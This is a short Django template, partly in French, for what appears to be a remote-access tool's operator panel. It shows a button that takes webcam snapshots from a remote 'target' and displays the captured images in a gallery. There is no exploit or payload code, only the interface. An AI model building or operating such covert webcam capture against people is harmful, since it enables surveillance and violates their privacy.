{% extends "server/session.html" %}
{% block session_content %}

{% if has_webcam %}
<p class="mb-4">
	<a class="btn btn-outline-primary" href="{% url "action_webcam" id %}">Prendre un snapshot de la webcam</a>
</p>

<div class="container">
				{% for i in images %}
				   <!-- Row of size 3 -->
				   {% if forloop.counter0|modulo:3 == 0 %}
					 <div class="row">
					 {% endif %}

						 <a href="{{ i }}" data-toggle="lightbox" data-gallery="gallery" class="col-md-4">
							 <img src="{{ i }}" class="img-fluid rounded">
						 </a>

					 {% if forloop.counter0|modulo:3 == 2 or loop.last %}
				   </div>
					 {% endif %}
				{% endfor %}
    </div>
</div>
{% endif %}

	{% if not has_webcam %}
	<p class="text-center"><font color="red">Target doesn't have webcam.</font></p>
	{% endif %}


{% endblock %}
